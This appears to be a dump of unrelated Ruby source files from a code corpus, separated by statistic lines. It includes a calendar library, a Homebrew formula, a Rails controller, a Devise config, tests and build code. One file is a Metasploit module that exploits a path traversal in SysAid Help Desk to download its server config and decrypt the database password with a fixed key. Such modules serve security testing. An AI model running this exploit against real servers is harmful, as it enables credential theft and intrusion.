# -*- encoding : utf-8 -*- =begin Copyright (C) 2008 Sam Roberts This library is free software; you can redistribute it and/or modify it under the same terms as the ruby language itself, see the file COPYING for details. =end require 'enumerator' require 'plist' require 'vpim/icalendar' require 'vpim/duration' module Vpim # A Repo is a representation of a calendar repository. # # Currently supported repository types are: # - Repo::Apple3, an Apple iCal3 repository. # - Repo::Directory, a directory hierarchy containing .ics files # # All repository types support at least the methods of Repo, and all # repositories return calendars that support at least the methods of # Repo::Calendar. class Repo include Enumerable # Open a repository at location +where+. def initialize(where) end # Enumerate the calendars in the repository. def each #:yield: calendar end # A calendar abstraction. It models a calendar in a calendar repository # that may not be an iCalendar. # # It has methods that behave identically to Icalendar, but it also has # methods like name and displayed that are not present in an iCalendar. class Calendar include Enumerable # The calendar name. def name end # Whether a calendar should be displayed. # # TODO - should be #displayed? def displayed end # Encode into iCalendar format. def encode end # Enumerate the components in the calendar, both todos and events, or # the specified klass. Like Icalendar#each() def each(klass=nil, &block) #:yield: component end # Enumerate the events in the calendar. def events(&block) #:yield: Vevent each(Vpim::Icalendar::Vevent, &block) end # Enumerate the todos in the calendar. def todos(&block) #:yield: Vtodo each(Vpim::Icalendar::Vtodo, &block) end # The method definitions are just to fool rdoc, not to be used. %w{each name displayed encode}.each{|m| remove_method m} def file_each(file, klass, &block) #:nodoc: unless iterator? return Enumerable::Enumerator.new(self, :each, klass) end cals = Vpim::Icalendar.decode(File.open(file)) cals.each do |cal| cal.each(klass, &block) end self end end end class Repo include Enumerable # An Apple iCal version 3 repository. class Apple3 < Repo def initialize(where = "~/Library/Calendars") @where = where.to_str end def each #:nodoc: Dir[ File.expand_path(@where + "/**/*.calendar") ].each do |dir| yield Calendar.new(dir) end self end class Calendar < Repo::Calendar def initialize(dir) # :nodoc: @dir = dir end def plist(key) #:nodoc: Plist::parse_xml( @dir + "/Info.plist")[key] end def name #:nodoc: plist "Title" end def displayed #:nodoc: 1 == plist("Checked") end def each(klass=nil, &block) #:nodoc: unless iterator? return Enumerable::Enumerator.new(self, :each, klass) end Dir[ @dir + "/Events/*.ics" ].map do |ics| file_each(ics, klass, &block) end self end def encode #:nodoc: Icalendar.create2 do |cal| each{|c| cal << c} end.encode end end end class Directory < Repo class Calendar < Repo::Calendar def initialize(file) #:nodoc: @file = file end def name #:nodoc: File.basename(@file) end def displayed #:nodoc: true end def each(klass, &block) #:nodoc: file_each(@file, klass, &block) end def encode #:nodoc: open(@file, "r"){|f| f.read} end end def initialize(where = ".") @where = where.to_str end def each #:nodoc: Dir[ File.expand_path(@where + "/**/*.ics") ].each do |file| yield Calendar.new(file) end self end end end end
23.371585
76
0.580781
111ef0529b549c4099e29cfd8a7b110928f2c56d
1,215
class GstPython < Formula desc "Python overrides for gobject-introspection-based pygst bindings" homepage "https://gstreamer.freedesktop.org/modules/gst-python.html" url "https://gstreamer.freedesktop.org/src/gst-python/gst-python-1.8.1.tar.xz" sha256 "76a3bfb72f9cb81d2b2cf8d07e420478e5b3592ea4b8056bb8c8127f73810a98" bottle do sha256 "c10f8eecb52a3d1139c0e414c79a07b481c15fcd51a9674cba273a57e6605c62" => :el_capitan sha256 "adca010f73dd2df8fed604f5674e54caf6bb61904adb147f64f62fb974262ac0" => :yosemite sha256 "e708aa675d5744fc36608249728290d6d97803cd071bf2ac91d245a9d8e8c996" => :mavericks end depends_on "gst-plugins-base" depends_on "pygobject3" link_overwrite "lib/python2.7/site-packages/gi/overrides" def install # pygi-overrides-dir switch ensures files don't break out of sandbox. system "./configure", "--disable-dependency-tracking", "--disable-silent-rules", "--prefix=#{prefix}", "--with-pygi-overrides-dir=#{lib}/python2.7/site-packages/gi/overrides" system "make", "install" end test do system "#{Formula["gstreamer"].opt_bin}/gst-inspect-1.0", "python" end end
39.193548
97
0.720165
f7538da134fbd418ea09779075869ae3b06f7004
1,619
class PasswordResetsController < ApplicationController before_action :get_user, only: [:edit, :update] before_action :valid_user, only: [:edit, :update] before_action :check_expiration, only:[:edit, :update] def new end def create @user = User.find_by(email: params[:password_reset][:email].downcase) if @user @user.create_reset_digest @user.send_password_reset_email flash[:info] = "Email sent with password reset instructions" redirect_to root_url else flash.now[:danger] = "Email address not found" render 'new' end end def edit end def update if params[:user][:password].empty? @user.errors.add(:password, "can't be empty") render 'edit' elsif @user.update_attributes(user_params) log_in @user @user.update_attribute(:reset_digest, nil) flash[:success] = "Password has been reset" redirect_to @user else render 'edit' end end private def user_params params.require(:user).permit(:password, :password_confirmation) end # Before filters def get_user @user = User.find_by(email: params[:email]) end # Confirms a valid user def valid_user unless (@user && @user.activated? && @user.authenticated?(:reset, params[:id])) redirect_to root_url end end # Checks expiration of reset token def check_expiration if @user.password_reset_expired? flash[:danger] = "Password reset has expired" redirect_to new_password_reset_url end end end
23.808824
73
0.643607
033c19fceddafe1179126d65a76cfda65b1747bf
4,116
#frozen_string_literal: true require 'set' # rows = y, cols = x # [y, x] # https://www.geeksforgeeks.org/number-integral-points-two-points/ require 'minitest/autorun' # https://adventofcode.com/2019/day/10 class Day10 < MiniTest::Test ASTEROID_MAP = DATA.read def test_1 map = <<~EOS .#..# ..... ##### ....# ...## EOS points = all_points(map) station = best_station(map) assert_equal [3, 4], station.first assert_equal 8, points.map { |point| visible_from(point, points) }.map(&:length).max end def test_2 map = <<~EOS ......#.#. #..#.#.... ..#######. .#.#.###.. .#..#..... ..#....#.# #..#....#. .##.#..### ##...#..#. .#....#### EOS points = all_points(map) assert_equal [5, 8], best_station(map).first assert_equal 33, points.map { |point| visible_from(point, points) }.map(&:length).max end def test_3 map = <<~EOS .#..##.###...####### ##.############..##. .#.######.########.# .###.#######.####.#. #####.##.#.##.###.## ..#####..#.######### #################### #.####....###.#.#.## ##.################# #####.##.###..####.. ..######..##.####### ####.##.####...##..# .#####..#.######.### ##...#.##########... #.##########.####### .####.#.###.###.#.## ....##.##.###..##### .#.#.###########.### #.#.#.#####.####.### ###.##.####.##.#..## EOS points = all_points(map) assert_equal 210, points.map { |point| visible_from(point, points) }.map(&:length).max end def test_final_1 map = ASTEROID_MAP.dup points = all_points(map) assert_equal 280, points.map { |point| visible_from(point, points) }.map(&:length).max end def test_final_2 map = ASTEROID_MAP.dup home, _ = best_station(map) row_cols = map.split("\n") height, width = row_cols.length, row_cols.first.length all_asteroids = all_points(map) directions = (-height..height).flat_map { |dy| (-width..width).map { |dx| [dx, dy] if dy.gcd(dx) == 1 }.compact } count = 0 answer = nil directions.sort_by { |dy, dx| -Math.atan2(dx, dy) }.cycle do |dx, dy| limit = 1 break if count == 200 while count < 200 x = (dx + home.last) * limit y = (dy + home.first) * limit break unless (0...height).cover?(y) && (0...width).cover?(x) limit += 1 coords = [y, x] asteroid = all_asteroids.delete(coords) next if asteroid.nil? if (count += 1) == 200 y, x = asteroid answer = x * 100 + y end end end assert_equal 706, answer end private def visible_from(from_point, points) visible = [].to_set points.each do |point| next if point == from_point vec = [point.first - from_point.first, point.last - from_point.last] gcd = vec.first.gcd(vec.last).abs vec = [vec.first / gcd, vec.last / gcd] visible << vec end visible end def best_station(map) points = all_points(map) points.map { |point| [point, visible_from(point, points)] }.max_by { |e| e.last.length } end def all_points(map) row_cols = map.split("\n") rows, cols = row_cols.length, row_cols.first.length points = [] rows.times do |row| cols.times do |col| points << [col, row] if row_cols[row][col] == '#' end end points end end __END__ .###.#...#.#.##.#.####.. .#....#####...#.######.. #.#.###.###.#.....#.#### ##.###..##..####.#.####. ###########.#######.##.# ##########.#########.##. .#.##.########.##...###. ###.#.##.#####.#.###.### ##.#####.##..###.#.##.#. .#.#.#####.####.#..##### .###.#####.#..#..##.#.## ########.##.#...######## .####..##..#.###.###.#.# ....######.##.#.######.# ###.####.######.#....### ############.#.#.##.#### ##...##..####.####.#..## .###.#########.###..#.## #.##.#.#...##...#####..# ##.#..###############.## ##.###.#####.##.######.. ##.#####.#.#.##..####### ...#######.######...#### #....#.#.#.####.#.#.#.##
24.5
92
0.406948
611e9be02e1d3e88600a7c0ed80e314e02799ae6
1,293
require 'spec_helper' module Squeel module Nodes describe Predicate do it 'accepts a value on instantiation' do @p = Predicate.new :name, :eq, 'value' @p.value.should eq 'value' end it 'sets value via accessor' do @p = Predicate.new :name, :eq @p.value = 'value' @p.value.should eq 'value' end it 'sets value via %' do @p = Predicate.new :name, :eq @p % 'value' @p.value.should eq 'value' end it 'can be inquired for value presence' do @p = Predicate.new :name, :eq @p.value?.should be_false @p.value = 'value' @p.value?.should be_true end it 'can be ORed with another predicate' do left = Predicate.new :name, :eq, 'Joe' right = Predicate.new :name, :eq, 'Bob' combined = left | right combined.should be_a Nodes::Or combined.left.should eq left combined.right.should eq right end it 'can be ANDed with another predicate' do left = Predicate.new :name, :eq, 'Joe' right = Predicate.new :name, :eq, 'Bob' combined = left & right combined.should be_a Nodes::And combined.children.should eq [left, right] end end end end
25.86
49
0.567672
f8ca4c03158646312ec5c4cd08ed94d0f9a40d12
1,326
# -*- encoding: utf-8 -*- # stub: strscan 1.0.3 ruby lib # stub: ext/strscan/extconf.rb Gem::Specification.new do |s| s.name = "strscan".freeze s.version = "1.0.3" s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version= s.require_paths = ["lib".freeze] s.authors = ["Minero Aoki".freeze, "Sutou Kouhei".freeze] s.date = "2021-07-06" s.description = "Provides lexical scanning operations on a String.".freeze s.email = [nil, "[email protected]".freeze] s.extensions = ["ext/strscan/extconf.rb".freeze] s.files = ["ext/strscan/extconf.rb".freeze, "strscan.so".freeze] s.homepage = "https://github.com/ruby/strscan".freeze s.licenses = ["BSD-2-Clause".freeze] s.required_ruby_version = Gem::Requirement.new(">= 2.4.0".freeze) s.rubygems_version = "3.1.6".freeze s.summary = "Provides lexical scanning operations on a String.".freeze if s.respond_to? :specification_version then s.specification_version = 4 end if s.respond_to? :add_runtime_dependency then s.add_development_dependency(%q<rake-compiler>.freeze, [">= 0"]) s.add_development_dependency(%q<benchmark-driver>.freeze, [">= 0"]) else s.add_dependency(%q<rake-compiler>.freeze, [">= 0"]) s.add_dependency(%q<benchmark-driver>.freeze, [">= 0"]) end end
37.885714
112
0.69457
e2331c4197f7403238e081537faf4a72fb707313
13,711
# frozen_string_literal: true # Use this hook to configure devise mailer, warden hooks and so forth. # Many of these configuration options can be set straight in your model. Devise.setup do |config| # The secret key used by Devise. Devise uses this key to generate # random tokens. Changing this key will render invalid all existing # confirmation, reset password and unlock tokens in the database. # Devise will use the `secret_key_base` as its `secret_key` # by default. You can change it below and use your own secret key. config.secret_key = ENV['DEVISE_SECRET_KEY'] # ==> Controller configuration # Configure the parent class to the devise controllers. # config.parent_controller = 'DeviseController' # ==> Mailer Configuration # Configure the e-mail address which will be shown in Devise::Mailer, # note that it will be overwritten if you use your own mailer class # with default "from" parameter. config.mailer_sender = '[email protected]' # Configure the class responsible to send e-mails. # config.mailer = 'Devise::Mailer' # Configure the parent class responsible to send e-mails. # config.parent_mailer = 'ActionMailer::Base' # ==> ORM configuration # Load and configure the ORM. Supports :active_record (default) and # :mongoid (bson_ext recommended) by default. Other ORMs may be # available as additional gems. require 'devise/orm/active_record' # ==> Configuration for any authentication mechanism # Configure which keys are used when authenticating a user. The default is # just :email. You can configure it to use [:username, :subdomain], so for # authenticating a user, both parameters are required. Remember that those # parameters are used only when authenticating and not when retrieving from # session. If you need permissions, you should implement that in a before filter. # You can also supply a hash where the value is a boolean determining whether # or not authentication should be aborted when the value is not present. # config.authentication_keys = [:email] # Configure parameters from the request object used for authentication. Each entry # given should be a request method and it will automatically be passed to the # find_for_authentication method and considered in your model lookup. For instance, # if you set :request_keys to [:subdomain], :subdomain will be used on authentication. # The same considerations mentioned for authentication_keys also apply to request_keys. # config.request_keys = [] # Configure which authentication keys should be case-insensitive. # These keys will be downcased upon creating or modifying a user and when used # to authenticate or find a user. Default is :email. config.case_insensitive_keys = [:email] # Configure which authentication keys should have whitespace stripped. # These keys will have whitespace before and after removed upon creating or # modifying a user and when used to authenticate or find a user. Default is :email. config.strip_whitespace_keys = [:email] # Tell if authentication through request.params is enabled. True by default. # It can be set to an array that will enable params authentication only for the # given strategies, for example, `config.params_authenticatable = [:database]` will # enable it only for database (email + password) authentication. # config.params_authenticatable = true # Tell if authentication through HTTP Auth is enabled. False by default. # It can be set to an array that will enable http authentication only for the # given strategies, for example, `config.http_authenticatable = [:database]` will # enable it only for database authentication. The supported strategies are: # :database = Support basic authentication with authentication key + password # config.http_authenticatable = false # If 401 status code should be returned for AJAX requests. True by default. # config.http_authenticatable_on_xhr = true # The realm used in Http Basic Authentication. 'Application' by default. # config.http_authentication_realm = 'Application' # It will change confirmation, password recovery and other workflows # to behave the same regardless if the e-mail provided was right or wrong. # Does not affect registerable. # config.paranoid = true # By default Devise will store the user in session. You can skip storage for # particular strategies by setting this option. # Notice that if you are skipping storage for all authentication paths, you # may want to disable generating routes to Devise's sessions controller by # passing skip: :sessions to `devise_for` in your config/routes.rb config.skip_session_storage = [:http_auth] # By default, Devise cleans up the CSRF token on authentication to # avoid CSRF token fixation attacks. This means that, when using AJAX # requests for sign in and sign up, you need to get a new CSRF token # from the server. You can disable this option at your own risk. # config.clean_up_csrf_token_on_authentication = true # When false, Devise will not attempt to reload routes on eager load. # This can reduce the time taken to boot the app but if your application # requires the Devise mappings to be loaded during boot time the application # won't boot properly. # config.reload_routes = true # ==> Configuration for :database_authenticatable # For bcrypt, this is the cost for hashing the password and defaults to 11. If # using other algorithms, it sets how many times you want the password to be hashed. # # Limiting the stretches to just one in testing will increase the performance of # your test suite dramatically. However, it is STRONGLY RECOMMENDED to not use # a value less than 10 in other environments. Note that, for bcrypt (the default # algorithm), the cost increases exponentially with the number of stretches (e.g. # a value of 20 is already extremely slow: approx. 60 seconds for 1 calculation). config.stretches = Rails.env.test? ? 1 : 11 # Set up a pepper to generate the hashed password. # config.pepper = 'f70f11a4e0fdc4c4b475a9efaf92794115ab4eadfab3aec18c8bd2e1ad1a24f6a4949316e3969d01a3855e192f73eb3fac3f9069dc13a57438ed9b6d26ed7c62' # Send a notification to the original email when the user's email is changed. # config.send_email_changed_notification = false # Send a notification email when the user's password is changed. # config.send_password_change_notification = false # ==> Configuration for :confirmable # A period that the user is allowed to access the website even without # confirming their account. For instance, if set to 2.days, the user will be # able to access the website for two days without confirming their account, # access will be blocked just in the third day. Default is 0.days, meaning # the user cannot access the website without confirming their account. # config.allow_unconfirmed_access_for = 2.days # A period that the user is allowed to confirm their account before their # token becomes invalid. For example, if set to 3.days, the user can confirm # their account within 3 days after the mail was sent, but on the fourth day # their account can't be confirmed with the token any more. # Default is nil, meaning there is no restriction on how long a user can take # before confirming their account. # config.confirm_within = 3.days # If true, requires any email changes to be confirmed (exactly the same way as # initial account confirmation) to be applied. Requires additional unconfirmed_email # db field (see migrations). Until confirmed, new email is stored in # unconfirmed_email column, and copied to email column on successful confirmation. config.reconfirmable = true # Defines which key will be used when confirming an account # config.confirmation_keys = [:email] # ==> Configuration for :rememberable # The time the user will be remembered without asking for credentials again. # config.remember_for = 2.weeks # Invalidates all the remember me tokens when the user signs out. config.expire_all_remember_me_on_sign_out = true # If true, extends the user's remember period when remembered via cookie. # config.extend_remember_period = false # Options to be passed to the created cookie. For instance, you can set # secure: true in order to force SSL only cookies. # config.rememberable_options = {} # ==> Configuration for :validatable # Range for password length. # config.password_length = 6..128 # Email regex used to validate email formats. It simply asserts that # one (and only one) @ exists in the given string. This is mainly # to give user feedback and not to assert the e-mail validity. # config.email_regexp = /\A[^@\s]+@[^@\s]+\z/ # ==> Configuration for :timeoutable # The time you want to timeout the user session without activity. After this # time the user will be asked for credentials again. Default is 30 minutes. # config.timeout_in = 30.minutes # ==> Configuration for :lockable # Defines which strategy will be used to lock an account. # :failed_attempts = Locks an account after a number of failed attempts to sign in. # :none = No lock strategy. You should handle locking by yourself. # config.lock_strategy = :failed_attempts # Defines which key will be used when locking and unlocking an account # config.unlock_keys = [:email] # Defines which strategy will be used to unlock an account. # :email = Sends an unlock link to the user email # :time = Re-enables login after a certain amount of time (see :unlock_in below) # :both = Enables both strategies # :none = No unlock strategy. You should handle unlocking by yourself. # config.unlock_strategy = :both # Number of authentication tries before locking an account if lock_strategy # is failed attempts. # config.maximum_attempts = 20 # Time interval to unlock the account if :time is enabled as unlock_strategy. # config.unlock_in = 1.hour # Warn on the last attempt before the account is locked. # config.last_attempt_warning = true # ==> Configuration for :recoverable # # Defines which key will be used when recovering the password for an account # config.reset_password_keys = [:email] # Time interval you can reset your password with a reset password key. # Don't put a too small interval or your users won't have the time to # change their passwords. config.reset_password_within = 6.hours # When set to false, does not sign a user in automatically after their password is # reset. Defaults to true, so a user is signed in automatically after a reset. # config.sign_in_after_reset_password = true # ==> Configuration for :encryptable # Allow you to use another hashing or encryption algorithm besides bcrypt (default). # You can use :sha1, :sha512 or algorithms from others authentication tools as # :clearance_sha1, :authlogic_sha512 (then you should set stretches above to 20 # for default behavior) and :restful_authentication_sha1 (then you should set # stretches to 10, and copy REST_AUTH_SITE_KEY to pepper). # # Require the `devise-encryptable` gem when using anything other than bcrypt # config.encryptor = :sha512 # ==> Scopes configuration # Turn scoped views on. Before rendering "sessions/new", it will first check for # "users/sessions/new". It's turned off by default because it's slower if you # are using only default views. # config.scoped_views = false # Configure the default scope given to Warden. By default it's the first # devise role declared in your routes (usually :user). # config.default_scope = :user # Set this configuration to false if you want /users/sign_out to sign out # only the current scope. By default, Devise signs out all scopes. # config.sign_out_all_scopes = true # ==> Navigation configuration # Lists the formats that should be treated as navigational. Formats like # :html, should redirect to the sign in page when the user does not have # access, but formats like :xml or :json, should return 401. # # If you have any extra navigational formats, like :iphone or :mobile, you # should add them to the navigational formats lists. # # The "*/*" below is required to match Internet Explorer requests. # config.navigational_formats = ['*/*', :html] # The default HTTP method used to sign out a resource. Default is :delete. config.sign_out_via = :delete # ==> OmniAuth # Add a new OmniAuth provider. Check the wiki for more information on setting # up on your models and hooks. # config.omniauth :github, 'APP_ID', 'APP_SECRET', scope: 'user,public_repo' # ==> Warden configuration # If you want to use other strategies, that are not supported by Devise, or # change the failure app, you can configure them inside the config.warden block. # # config.warden do |manager| # manager.intercept_401 = false # manager.default_strategies(scope: :user).unshift :some_external_strategy # end # ==> Mountable engine configurations # When using Devise inside an engine, let's call it `MyEngine`, and this engine # is mountable, there are some extra configurations to be taken into account. # The following options are available, assuming the engine is mounted as: # # mount MyEngine, at: '/my_engine' # # The router that invoked `devise_for`, in the example above, would be: # config.router_name = :my_engine # # When using OmniAuth, Devise cannot automatically set OmniAuth path, # so you need to do it manually. For the users scope, it would be: # config.omniauth_path_prefix = '/my_engine/users/auth' end
48.278169
150
0.749325
38d7e8b2a8d59bef90d4cfaa9dc4aed301c913c2
5,270
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'openssl' class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => 'SysAid Help Desk Database Credentials Disclosure', 'Description' => %q{ This module exploits a vulnerability in SysAid Help Desk that allows an unauthenticated user to download arbitrary files from the system. This is used to download the server configuration file that contains the database username and password, which is encrypted with a fixed, known key. This module has been tested with SysAid 14.4 on Windows and Linux. }, 'Author' => [ 'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2015-2996'], ['CVE', '2015-2998'], ['URL', 'http://seclists.org/fulldisclosure/2015/Jun/8'], ['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/sysaid-14.4-multiple-vulns.txt'] ], 'DisclosureDate' => 'Jun 3 2015')) register_options( [ OptPort.new('RPORT', [true, 'The target port', 8080]), OptString.new('TARGETURI', [ true, 'SysAid path', '/sysaid']), ], self.class) end def decrypt_password (ciphertext) salt = [-87, -101, -56, 50, 86, 53, -29, 3].pack('c*') cipher = OpenSSL::Cipher::Cipher.new("DES") base_64_code = Rex::Text.decode_base64(ciphertext) cipher.decrypt cipher.pkcs5_keyivgen 'inigomontoya', salt, 19 plaintext = cipher.update base_64_code plaintext << cipher.final plaintext end def run begin res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(datastore['TARGETURI'], 'getGfiUpgradeFile'), 'vars_get' => { 'fileName' => '../conf/serverConf.xml' }, }) rescue Rex::ConnectionRefused fail_with(Failure::Unreachable, "#{peer} - Could not connect.") end if res && res.code == 200 && res.body.to_s.bytesize != 0 username = /\<dbUser\>(.*)\<\/dbUser\>/.match(res.body.to_s) encrypted_password = /\<dbPassword\>(.*)\<\/dbPassword\>/.match(res.body.to_s) database_url = /\<dbUrl\>(.*)\<\/dbUrl\>/.match(res.body.to_s) database_type = /\<dbType\>(.*)\<\/dbType\>/.match(res.body.to_s) unless username && encrypted_password && database_type && database_url fail_with(Failure::Unknown, "#{peer} - Failed to obtain database credentials.") end username = username.captures[0] encrypted_password = encrypted_password.captures[0] database_url = database_url.captures[0] database_type = database_type.captures[0] password = decrypt_password(encrypted_password[6..encrypted_password.length]) credential_core = report_credential_core({ password: password, username: username }) matches = /(\w*):(\w*):\/\/(.*)\/(\w*)/.match(database_url) if matches begin if database_url['localhost'] == 'localhost' db_address = matches.captures[2] db_port = db_address[(db_address.index(':') + 1)..(db_address.length - 1)].to_i db_address = rhost else db_address = matches.captures[2] if db_address.index(':') db_address = db_address[0, db_address.index(':')] db_port = db_address[db_address.index(':')..(db_address.length - 1)].to_i else db_port = 0 end db_address = Rex::Socket.getaddress(db_address, true) end database_login_data = { address: db_address, service_name: database_type, protocol: 'tcp', port: db_port, workspace_id: myworkspace_id, core: credential_core, status: Metasploit::Model::Login::Status::UNTRIED } create_credential_login(database_login_data) # Skip creating the Login, but tell the user about it if we cannot resolve the DB Server Hostname rescue SocketError fail_with(Failure::Unknown, 'Could not resolve database server hostname.') end print_status("Stored SQL credentials #{username}:#{password} for #{matches.captures[2]}") return end else fail_with(Failure::NotVulnerable, "#{peer} - Failed to obtain database credentials, response was: #{res.code}") end end def report_credential_core(cred_opts={}) origin_service_data = { address: rhost, port: rport, service_name: (ssl ? 'https' : 'http'), protocol: 'tcp', workspace_id: myworkspace_id } credential_data = { origin_type: :service, module_fullname: self.fullname, private_type: :password, private_data: cred_opts[:password], username: cred_opts[:username] } credential_data.merge!(origin_service_data) create_credential(credential_data) end end
34.671053
117
0.617268
e2628e2908c515f2582b7279989e0c08a14c398e
270
# frozen_string_literal: true module ClickHouse module Type class BaseType def cast(_value, *) raise NotImplementedError, __method__ end def serialize(_value, *) raise NotImplementedError, __method__ end end end end
16.875
45
0.659259
acf452847993aa60ff07eb1af3a1986723ccd76b
1,130
class AnswersController < ApplicationController before_filter :find_question # POST /answers # POST /answers.json def create authorize! :create, Answer @answer = @question.answers.build(params[:answer]) @answer.user = current_user if @answer.save @msg = t("alert.answer.create_success", default: 'Answer was successfully created.') else @msg = @answer.errors.full_messages.join("<br />") end end # PUT /answers/1 # PUT /answers/1.json def update @answer = @question.answers.find(params[:id]) authorize! :update, @answer if @answer.update_attributes(params[:answer]) @msg = t("alert.answer.update_success", default: 'Update Successful.') else @msg = @error = @answer.errors.full_messages.join("<br />") end end # DELETE /answers/1 # DELETE /answers/1.json def destroy @answer = @question.answers.find(params[:id]) authorize! :destroy, @answer @answer.destroy head :no_content end protected def find_question @question = current_node.questions.find(params[:question_id]) end end
24.042553
90
0.654867
4a2713fee01c1ef47dc8dde4a3e0a3284ccc2df8
3,330
# Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. module Azure::Cosmosdb::Mgmt::V2020_03_01 module Models # # Parameters to create and update Cosmos DB Table. # class TableCreateUpdateParameters < ARMResourceProperties include MsRestAzure # @return [TableResource] The standard JSON format of a Table attr_accessor :resource # @return [CreateUpdateOptions] A key-value pair of options to be applied # for the request. This corresponds to the headers sent with the request. attr_accessor :options # # Mapper for TableCreateUpdateParameters class as Ruby Hash. # This will be used for serialization/deserialization. # def self.mapper() { client_side_validation: true, required: false, serialized_name: 'TableCreateUpdateParameters', type: { name: 'Composite', class_name: 'TableCreateUpdateParameters', model_properties: { id: { client_side_validation: true, required: false, read_only: true, serialized_name: 'id', type: { name: 'String' } }, name: { client_side_validation: true, required: false, read_only: true, serialized_name: 'name', type: { name: 'String' } }, type: { client_side_validation: true, required: false, read_only: true, serialized_name: 'type', type: { name: 'String' } }, location: { client_side_validation: true, required: false, serialized_name: 'location', type: { name: 'String' } }, tags: { client_side_validation: true, required: false, serialized_name: 'tags', type: { name: 'Dictionary', value: { client_side_validation: true, required: false, serialized_name: 'StringElementType', type: { name: 'String' } } } }, resource: { client_side_validation: true, required: true, serialized_name: 'properties.resource', type: { name: 'Composite', class_name: 'TableResource' } }, options: { client_side_validation: true, required: true, serialized_name: 'properties.options', type: { name: 'Composite', class_name: 'CreateUpdateOptions' } } } } } end end end end
30
79
0.452252
8780f88469940ce1f2f310dc35af46f73efa2804
639
class Reportsheet < ApplicationRecord belongs_to :user has_many :positions, dependent: :destroy def add_geoposition(lats, lons, recdates, uid, rsid) #position = Position.where("user_id=?", uid).last #if position != nil # (0..lats.count-1).each do |i| # if recdates[i] >= position.recdate # Position.create(reportsheet_id: rsid, lat: lats[i], lon: lons[i], recdate: recdates[i], user_id: uid) # end # end #else (0..lats.count-1).each do |i| Position.create(reportsheet_id: rsid, lat: lats[i], lon: lons[i], recdate: recdates[i], user_id: uid) end #end end end
31.95
112
0.627543
f874875b7eca3bb8ee36c37bafa005b80918a4d8
924
class Gsl114 < Formula homepage "https://www.gnu.org/software/gsl/" url "http://ftpmirror.gnu.org/gsl/gsl-1.14.tar.gz" mirror "https://ftp.gnu.org/gnu/gsl/gsl-1.14.tar.gz" sha256 "3d4a47afd9a1e7c73b97791b4180d8cc4d5f0e5db6027fe06437f1f3f957fafb" bottle do cellar :any sha256 "e3e5dcf0d83043554296bc8dc836dcd04c496b8417bd004adab5420dc8c212b5" => :yosemite sha256 "5efe0db286ac52fdd72976264d1bdf1852d3d5ae6a6971a0297edc7c2f724e75" => :mavericks sha256 "11f5aff7fdbc03258801ae76373ba5d7420f24e1beca93de7435464df0578b19" => :mountain_lion end option :universal def install ENV.universal_binary if build.universal? system "./configure", "--disable-dependency-tracking", "--prefix=#{prefix}" system "make" # "make" and "make install" *must* be done separately system "make", "install" end test do system bin/"gsl-config", "--prefix", "--cflags", "--version" end end
31.862069
95
0.739177
180f6963909a6b2805df245777afd39271406f1b
1,717
require 'rubygems' require 'fog/telefonica' # version >= 1.37 auth_url = "https://example.net:5000/v3/auth/tokens" username = '[email protected]' password = 'secret' project = 'admin' @connection_params = { :telefonica_auth_url => auth_url, :telefonica_username => username, :telefonica_api_key => password, :telefonica_project_name => project, :telefonica_domain_id => "default" } inspector = Fog::Introspection::Telefonica.new(@connection_params) # Introspection of an Ironic node ironic = Fog::Baremetal::Telefonica.new(@connection_params) nodes = ironic.list_nodes node1_uuid = nodes.body["nodes"][0]["uuid"] # Launch introspection inspector.create_introspection(node1_uuid) # Introspection status inspector.get_introspection(node1_uuid) # Abort introspection inspector.abort_introspection(node1_uuid) # Retrieve introspection data # Note: introspection must be finished and ended successfully inspector.get_introspection_details(node1_uuid) ## Introspection Rules # Create a set of rules rules = { "description" => "Successful Rule", "actions" => [ { "action" => "set-attribute", "path" => "/extra/rule_success", "value" => "yes" } ], "conditions" => [ { "field" => "memory_mb", "op" => "ge", "value" => 256 }, { "field" => "local_gb", "op" => "ge", "value" => 1 } ] } inspector.create_rules(rules) # List all rules set rules1 = inspector.list_rules # Show a rules set rules1_uuid = rules1[:body]["rules"][0]['uuid'] inspector.get_rules(rules1_uuid) # Delete a specific rules set inspector.delete_rules(rules1_uuid) # Destroys all rules sets inspector.delete_rules_all
22.592105
66
0.683168
edf3c46a03d833cb3e7f386f60430e540b592867
137
class AddWantsParticipationToUser < ActiveRecord::Migration def change add_column :users, :wants_participation, :boolean end end
22.833333
59
0.79562
f84180d47c3bb4e2c322c5df17e0b5fb74a3fa14
522
#! /usr/bin/env ruby -S rspec require 'spec_helper' require 'puppet/indirector/file_content/file' describe Puppet::Indirector::FileContent::File do it "should be registered with the file_content indirection" do Puppet::Indirector::Terminus.terminus_class(:file_content, :file).should equal(Puppet::Indirector::FileContent::File) end it "should be a subclass of the DirectFileServer terminus" do Puppet::Indirector::FileContent::File.superclass.should equal(Puppet::Indirector::DirectFileServer) end end
34.8
121
0.781609
e899aabdc60b639c650fe99c677f4129847c887d
2,833
module Comet module Rules class Build def initialize(firmware, device) @firmware = firmware @device = device end def target @target ||= Comet::Makefile.fingerprint Hash[ dependencies: Set[rules.map(&:target).uniq] ], extension: :phony end def contents contents = [ ".PHONY: #{target}", "#{target}: #{rules.map(&:target).uniq.join ' '}" ] if fw_target.elf? contents.push "\t$(COMET_CP) #{link.target} #{fw_target.elf_output.path}" end if fw_target.bin? contents.push "\t$(COMET_CP) #{bin.target} #{fw_target.bin_output.path}" end if fw_target.hex? contents.push "\t$(COMET_CP) #{hex.target} #{fw_target.hex_output.path}" end if fw_target.map? contents.push "\t$(COMET_CP) #{link.map_file} #{fw_target.map_output.path}" end contents end def rules @rules ||= [link, bin, hex].compact end def commands { COMET_CP: 'cp' } end private def fw_target @firmware.target_for @device end def bin ObjCopy.new linker, link, 'binary', 'bin' if fw_target.bin? end def hex ObjCopy.new linker, link, 'ihex', 'hex' if fw_target.hex? end def link @link ||= Link.new linker, codegen, libraries, native_sources end def linker @firmware.hardware_for(@device).detect(&:linker?).linker_ end def native_sources @firmware.hardware_for(@device).flat_map do |hardware| hardware.sources.select(&:native?).flat_map(&:files) end end def libraries 